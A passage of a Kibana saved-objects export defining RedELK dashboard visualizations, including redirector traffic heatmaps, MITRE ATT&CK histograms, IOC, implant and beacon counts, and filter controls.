\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - Decoy\"}"}, "coreMigrationVersion": "7.16.3", "id": "10dd40f0-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 107], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"(redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - C2", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - C2\"}"}, "coreMigrationVersion": "7.16.3", "id": "1d26da60-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 109], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists metrics", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists metrics\",\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"IPs\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"group\"}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}}}"}, "coreMigrationVersion": "7.16.3", "id": "20fac240-926c-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642171875895, 111], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Techniques\"}"}, "coreMigrationVersion": "7.16.3", "id": "231792d0-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 113], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Tactics\"}"}, "coreMigrationVersion": "7.16.3", "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 115], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.source\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "2f77a150-926a-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642171875895, 117], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Modules results donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Modules results donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"split\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.last_run.status\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"row\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "2f971ac0-926b-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642171875895, 119], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC Types tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Types\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - IOC Types tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 121], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Screenshots total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "389dddc0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 123], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Alarmed IOC\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Alarmed IOC\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Alarmed IOC over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 125], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Downloads\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Downloads per user tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642171875895, 127], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links external", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**External tools** : [MITRE ATT&CK Navigator](/attack-navigator/) | [Jupyter Notebook](/jupyter/) | [Neo4j Browser](/neo4jbrowser/) \",\"openLinksInNewTab\":true},\"title\":\"RedELK - Dashboard links external\"}"}, "coreMigrationVersion": "7.16.3", "id": "45491770-0886-11eb-a2d2-171dc8941414", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642171875895, 128], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Techniques unique count total ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"threat.technique.id\",\"customLabel\":\"MITRE ATT&CK Techniques\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - TTP Techniques unique count total \"}"}, "coreMigrationVersion": "7.16.3", "id": "464660c0-d360-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 130], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "title": "RedELK - HTTP Redir filters", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir filters\",\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1627506187584\",\"fieldName\":\"redir.backend.name\",\"parent\":\"\",\"label\":\"Backend\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1627507362404\",\"fieldName\":\"source.as.organization.name\",\"parent\":\"\",\"label\":\"ASN\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"},{\"id\":\"1627507398459\",\"fieldName\":\"source.geo.country_iso_code\",\"parent\":\"\",\"label\":\"Country\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_2_index_pattern\"},{\"id\":\"1627507415074\",\"fieldName\":\"tags\",\"parent\":\"\",\"label\":\"Tags\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_3_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":true,\"pinFilters\":false}}"}, "coreMigrationVersion": "7.16.3", "id": "56350050-efe7-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_1_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_2_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_3_index_pattern", "type": "index-pattern"}], "sort": [1642171875895, 135], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Implants total count ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Implants\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Implants total count \"}"}, "coreMigrationVersion": "7.16.3", "id": "57626ad0-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 137], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - IOC total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 139], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Alarmed IP\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Redirector traffic alarmed IP total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 141], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per host", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per host\"}"}, "coreMigrationVersion": "7.16.3", "id": "632081a0-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 143], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": 